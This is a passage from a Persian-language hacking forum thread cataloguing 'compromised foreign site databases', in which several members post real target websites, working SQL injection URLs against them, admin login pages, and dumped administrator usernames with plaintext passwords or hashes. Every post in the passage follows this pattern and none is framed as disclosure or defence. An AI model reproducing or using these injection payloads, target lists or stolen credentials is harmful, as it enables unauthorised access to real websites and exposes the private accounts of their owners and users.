پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#51 ارسالی 22 آوریل 2016 - 04:10

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.zetty.co.za/

لینک اینجکت تیبل ادمین :

http://www.zetty.co.za/catalogue.php?catalogue=-schneider%27+UNION+SELECT+1,2,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28phpgen_users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,user_password%29%29%29%29x%29,4,5,6,7,8--+

تیبل ادمین :

admin:zxcvfr44
assie:assie@123
lizeth:liz@123

لاگین :

http://www.zetty.co.za/admin/login.php

موفق باشید.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#52 ارسالی 28 آوریل 2016 - 11:06

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 18 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

دیدم تایپیک داره خاک میخوره

========================

 

 

تارگت : http://www.c2-deutschland.de

 

لینک اینجکت : http://www.c2-deutsc...full.php?id=287

 

 http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...schema.tables--

 

========================================================================================================

 

 

http://www.c2-deutsc...=0x61646D696E--

 

 

 

 

http://www.c2-deutsc...14 from admin--


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#53 ارسالی 29 آوریل 2016 - 06:23

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 18 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown
http://www.crom.co.uk/news.php?id=7+order+by+9--


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,3,4,5,6,7,8,9--http://www.crom.co.uk/news.php?id=-7+union+select+1,2,version%28%29,4,5,6,7,8,9--http://www.crom.co.uk/news.php?id=-7+union+select+1,2,database%28%29,4,5,6,7,8,9--
http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--


==============================================================================================================================================================================


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x61646D696E--


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28id,0x3a,password%29,4,5,6,7,8,9+from+admin--
image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#54 ارسالی 30 آوریل 2016 - 02:24

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.mirfieldcc.co.uk/

لینک اینجکت :

http://www.mirfieldcc.co.uk/news/index.php?id=-87+UNION+SELECT+1,2,group_concat%280x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,id,0x3c666f6e7420636f6c6f723d6f72616e67653e20456d61696c203a20,loginname,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29,4,5,6,7,8+from+phplist_admin--+

لاگین :

http://www.mirfieldcc.co.uk/admin/

پسورد و یوزر

ID : 1 Email : admin Password : boycott24mcc,
ID : 2 Email : stevekadmin Password : mmg1664,
ID : 3 Email : belmabdi Password : 08101991

موفق باشید/


ویرایش شده توسط Blackwolf_Iran 30 آوریل 2016 - 02:26 .

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#55 ارسالی 04 مه 2016 - 01:40

Ormazd
+1,723
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit آوریل 20 2018 01:18
 • Country :
 • Gender : Male

تارگت :

http://www.bahiatur.net/

 لینک اینجکت :

http://www.bahiatur.net/viagem.php?ref=13&v=-211/*!50000union*//*!50000select*/1,2,3,4,5,/*!50000groUp_cOncat(email,0x3a,passwd)*/,7,8,9,10,11,12%20from%20admin_usuarios

لاگین :

http://www.bahiatur.net/admin/

یوزر و پسورد :

bahia.tur2@hotmail.com:btvt14

:)


به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#56 ارسالی 04 مه 2016 - 02:38

Ormazd
+1,723
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit آوریل 20 2018 01:18
 • Country :
 • Gender : Male

تارگت :

http://toplotrade.com/

لینک اینجکت :

http://toplotrade.com/products.php?cat_id=2&subcat_id=-32%20union%20select%200x3c68313e696e6a6563746564206279206f726d617a64203c2f68313e,group_concat(username,0x3a,password),3%20from%20users

لاگین 

http://toplotrade.com/admin/

یوزر ها 

apulchev:360d06396d737f04bb1f2db50709829e
 kliment:c8489eee3b7d9e0abcec120e6790e6bb  : 17dell
milena:d6631b160fd1be0d7fd7ca1bb72b9d4f   : moncler

:-*:)


ویرایش شده توسط Ormazd 04 مه 2016 - 02:39 .

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#57 ارسالی 06 مه 2016 - 01:10

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.mercerfarming.co.uk

لینک اینجکت تیبل pp_user :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (pp_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,user_login,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,user_pass))))x),4--+
	
Username : admin Password : 49ec3313b9460366d1ece2323b8fcbd0
Username : Josie Heath Password : d22670c08c084587c655e9fbae300589

لینک اینجکت mf_user :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (mf_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,user_login,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,user_pass))))x),4--+
Username : admin Password : 21962afa4d2b1471c5b1c9b40aa18f9d

لینک اینجکت ادمین اصلی :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password))))x),4--+
Username : mercer Password : 42b596f332bb139e43948416ef8f456d

لینک لاگین :

http://www.mercerfarming.co.uk/admin/

موفق باشید =)


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#58 ارسالی 06 مه 2016 - 06:24

mahi
+22
  OFFLINE
  تاریخ عضویت :
  06 مه 2016
 • %0▒▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 3 ارسال
  Last Visit دسامبر 07 2016 05:42
 • Country :
 • Gender : Female
 • Name : m@h

تارگت :

http://www.basicpaper.com

لینک اینجکت :

http://www.basicpaper.com/news.php?id=-78+union+select+1,2,3,4,group_concat%28name,0x3a,pass,0x3c62723e%29,6,7+from+access--+

رمز و پسورد لینک اینجکت :

sander:danser
,vincent:btp
,ruben:tcn

موفق باشید


ویرایش شده توسط Blackwolf_Iran 06 مه 2016 - 06:26 .


#59 ارسالی 07 مه 2016 - 12:05

mahi
+22
  OFFLINE
  تاریخ عضویت :
  06 مه 2016
 • %0▒▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 3 ارسال
  Last Visit دسامبر 07 2016 05:42
 • Country :
 • Gender : Female
 • Name : m@h

لینک تارگت:

http://www.coreworld.in

لینک اینجکت:

http://www.coreworld.in/news.php?id=-382+UNION%20SELECT%201,group_concat%28emailid,0x3A,ipassword%29,3,4,5+from+adminlogin--

رمز و پسورد لینک اینجکت:

info@ctspl.org:canyoufindmefucker

موفق باشید.#60 ارسالی 07 مه 2016 - 02:55

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.thirdcarrickband.co.uk

لاگین :

http://www.thirdcarrickband.co.uk/MusicSearch/login.php

لینک اینجکت یوزرا :

http://www.thirdcarrickband.co.uk/news_item.php?id=-155+UNION+SELECT+1,0x696e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28allusers%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,user_id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7,8,9--+

لینک اینجکت ادمین :

http://www.thirdcarrickband.co.uk/news_item.php?id=-155+UNION+SELECT+1,0x696e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cgc_users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7,8,9--+
user : golfadmin
pass : wood01

موفق باشید.


ویرایش شده توسط Blackwolf_Iran 07 مه 2016 - 02:59 .

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP